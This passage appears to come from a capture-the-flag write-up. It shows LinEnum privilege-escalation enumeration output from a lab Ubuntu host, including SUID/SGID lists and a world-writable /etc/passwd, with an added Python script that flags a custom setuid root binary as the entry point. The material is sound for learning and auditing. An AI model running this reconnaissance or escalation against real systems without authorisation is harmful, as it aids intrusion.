- -rwsr-xr-x 1 root root 45420 May 17 02:38 /usr/bin/passwd
- -rwsr-xr-x 1 root root 44620 May 17 02:38 /usr/bin/chfn
- -rwsr-xr-x 1 root root 18168 Nov 24 2015 /usr/bin/pkexec
- -rwsr-xr-x 1 root root 30984 May 17 02:38 /usr/bin/newgrp
- -rwsr-xr-x 1 root root 18136 May 8 2014 /usr/bin/traceroute6.iputils
- -rwsr-xr-x 1 root root 66284 May 17 02:38 /usr/bin/gpasswd
- -rwsr-xr-x 1 root root 156708 May 29 13:19 /usr/bin/sudo
- -rwsr-xr-x 1 root root 72860 Oct 21 2013 /usr/bin/mtr
- -rwsr-sr-x 1 libuuid libuuid 17996 Nov 24 2016 /usr/sbin/uuidd
- -rwsr-xr-- 1 root dip 323000 Apr 21 2015 /usr/sbin/pppd
- -rwsr-xr-x 1 root root 38932 May 8 2014 /bin/ping
- -rwsr-xr-x 1 root root 43316 May 8 2014 /bin/ping6
- -rwsr-xr-x 1 root root 35300 May 17 02:38 /bin/su
- -rwsr-xr-x 1 root root 30112 May 15 2015 /bin/fusermount
- -rwsr-xr-x 1 root root 88752 Nov 24 2016 /bin/mount
- -rwsr-xr-x 1 root root 67704 Nov 24 2016 /bin/umount
- SGID files:
- -rwsr-sr-x 1 daemon daemon 46652 Oct 21 2013 /usr/bin/at
- -rwxr-sr-x 3 root mail 9704 Dec 4 2012 /usr/bin/mail-lock
- -rwxr-sr-x 1 root utmp 406700 Nov 7 2013 /usr/bin/screen
- -rwxr-sr-x 1 root mlocate 34452 Jun 20 2013 /usr/bin/mlocate
- -rwxr-sr-x 1 root tty 9748 Jun 4 2013 /usr/bin/bsd-write
- -rwxr-sr-x 1 root ssh 329144 Aug 11 2016 /usr/bin/ssh-agent
- -rwxr-sr-x 1 root shadow 53516 May 17 02:38 /usr/bin/chage
- -rwxr-sr-x 1 root tty 18056 Nov 24 2016 /usr/bin/wall
- -rwxr-sr-x 1 root shadow 18208 May 17 02:38 /usr/bin/expiry
- -rwxr-sr-x 3 root mail 9704 Dec 4 2012 /usr/bin/mail-unlock
- -rwxr-sr-x 3 root mail 9704 Dec 4 2012 /usr/bin/mail-touchlock
- -rwxr-sr-x 1 root crontab 34824 Feb 9 2013 /usr/bin/crontab
- -rwxr-sr-x 1 root mail 13960 Dec 7 2013 /usr/bin/dotlockfile
- -rwsr-sr-x 1 libuuid libuuid 17996 Nov 24 2016 /usr/sbin/uuidd
- -rwxr-sr-x 1 root shadow 30432 Mar 16 2016 /sbin/unix_chkpwd
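Everything in the two lists above is a stock Ubuntu 14.04 binary except `/var/htb/bin/emergency`, a setuid root executable in a directory no package installs into. That is the entry to spend time on, and the triage below is the way to make it stand out automatically. It is an added example, not LinEnum code: it parses `ls -l` lines of the form printed above and flags setuid/setgid files that live outside package-managed directories, are setuid to a non-root account, or carry both bits. SAMPLE_LISTING reproduces a subset of the report's lines verbatim; STANDARD_DIRS is an assumption about where distro packages install privileged helpers, not something the report states.

```python
"""Triage a SUID/SGID listing such as the one LinEnum printed above.

Added example, not LinEnum's code. SAMPLE_LISTING is a subset of the
report's `ls -l` lines; STANDARD_DIRS is an assumed allowlist.
"""

SAMPLE_LISTING = """\
-rwsr-xr-x 1 root root 112204 Jun 14 18:27 /var/htb/bin/emergency
-rwsr-xr-x 1 root root 5480 Mar 27 18:34 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-- 1 root messagebus 333952 Dec 7 2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-sr-x 1 daemon daemon 46652 Oct 21 2013 /usr/bin/at
-rwsr-xr-x 1 root root 156708 May 29 13:19 /usr/bin/sudo
-rwsr-xr-x 1 root root 35300 May 17 02:38 /bin/su
-rwxr-sr-x 1 root shadow 53516 May 17 02:38 /usr/bin/chage
-rwsr-sr-x 1 libuuid libuuid 17996 Nov 24 2016 /usr/sbin/uuidd
"""

# Assumed allowlist: package-managed locations for setuid/setgid helpers.
STANDARD_DIRS = ("/bin/", "/sbin/", "/usr/bin/", "/usr/sbin/",
                 "/usr/lib/", "/usr/libexec/", "/lib/")


def parse_ls_line(line):
    """Parse one `ls -l` line. Paths may contain spaces, so split at most 8 times."""
    parts = line.split(None, 8)
    if len(parts) != 9 or len(parts[0]) != 10:
        return None
    mode, _links, owner, group, size, month, day, when, path = parts
    return {
        "mode": mode, "owner": owner, "group": group, "size": int(size),
        "mtime": f"{month} {day} {when}", "path": path,
        # 's' or 'S' in the owner/group execute slot marks setuid/setgid.
        "setuid": mode[3] in "sS", "setgid": mode[6] in "sS",
    }


def triage_suid(listing):
    """Return (path, reason) pairs for entries that need a human look."""
    flagged = []
    for line in listing.splitlines():
        e = parse_ls_line(line)
        if e is None or not (e["setuid"] or e["setgid"]):
            continue
        reasons = []
        if not e["path"].startswith(STANDARD_DIRS):
            reasons.append("outside package-managed directories; verify with dpkg -S")
        if e["setuid"] and e["owner"] != "root":
            reasons.append(f"setuid to non-root user {e['owner']}")
        if e["setuid"] and e["setgid"]:
            reasons.append("both setuid and setgid")
        if reasons:
            flagged.append((e["path"], "; ".join(reasons)))
    return flagged


if __name__ == "__main__":
    for path, reason in triage_suid(SAMPLE_LISTING):
        print(f"{path}: {reason}")
```

On the host itself, `find / -perm /6000 -type f -exec ls -l {} + 2>/dev/null` produces input in this exact format, and `dpkg -S /var/htb/bin/emergency` answers the "verify" step: a file no package claims, in a directory no package uses, with a recent mtime relative to the rest of the list, is the custom binary to reverse next. The `at` and `uuidd` hits are expected on a stock system (both are setuid to their own unprivileged accounts); they are reported so the reviewer consciously dismisses them rather than never seeing them.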
- World-writable files (excluding /proc):
- -rw-rw-rw- 1 root root 1252 May 28 22:40 /etc/passwd
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/policy/.remove
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/policy/.replace
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/policy/.load
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.remove
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.replace
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.load
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.ns_name
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.ns_level
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.ns_stacked
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.stacked
- -rw-rw-rw- 1 root root 0 Sep 18 11:00 /sys/kernel/security/apparmor/.access
- Can't search *.conf files as no keyword was entered
- Can't search *.log files as no keyword was entered
- Can't search *.ini files as no keyword was entered
- All *.conf files in /etc (recursive 1 level):
- -rw-r--r-- 1 root root 144 May 28 22:13 /etc/kernel-img.conf
- -rw-r--r-- 1 root root 321 Apr 16 2014 /etc/blkid.conf
- -rw-r--r-- 1 root root 191 Dec 4 2013 /etc/libaudit.conf
- -rw-r--r-- 1 root root 1320 Aug 19 2014 /etc/rsyslog.conf
- -rw-r--r-- 1 root root 1260 Jul 1 2013 /etc/ucf.conf
- -rw-r--r-- 1 root root 92 Feb 20 2014 /etc/host.conf
- -rw-r--r-- 1 root root 4781 Nov 15 2013 /etc/hdparm.conf
- -rw-r--r-- 1 root root 2584 Oct 10 2012 /etc/gai.conf
- -rw-r--r-- 1 root root 350 May 28 22:00 /etc/popularity-contest.conf
- -rw-r--r-- 1 root root 7788 May 28 22:00 /etc/ca-certificates.conf
- -rw-r--r-- 1 root root 552 Feb 1 2014 /etc/pam.conf
- -rw-r--r-- 1 root root 2084 Apr 1 2013 /etc/sysctl.conf
- -rw-r--r-- 1 root root 956 Feb 19 2014 /etc/mke2fs.conf
- -rw-r--r-- 1 root root 321 Jun 20 2013 /etc/updatedb.conf
- -rw-r--r-- 1 root root 14867 May 10 2014 /etc/ltrace.conf
- -rw-r--r-- 1 root root 604 Nov 7 2013 /etc/deluser.conf
- -rw-r--r-- 1 root root 34 Aug 3 2016 /etc/ld.so.conf
- -rw-r--r-- 1 root root 2969 Feb 23 2014 /etc/debconf.conf
- -rw-r--r-- 1 root root 475 Feb 20 2014 /etc/nsswitch.conf
- -rw-r--r-- 1 root root 2981 Aug 3 2016 /etc/adduser.conf
- -rw-r----- 1 root fuse 280 May 24 2013 /etc/fuse.conf
- -rw-r--r-- 1 root root 703 Jan 22 2014 /etc/logrotate.conf
- -rw-r--r-- 1 root root 771 May 19 2013 /etc/insserv.conf
- Any interesting mail in /var/mail:
- total 8
- drwxrwsr-x 2 root mail 4096 Aug 3 2016 .
- drwxr-xr-x 14 root root 4096 May 29 18:41 ..
- ### SCAN COMPLETE ####################################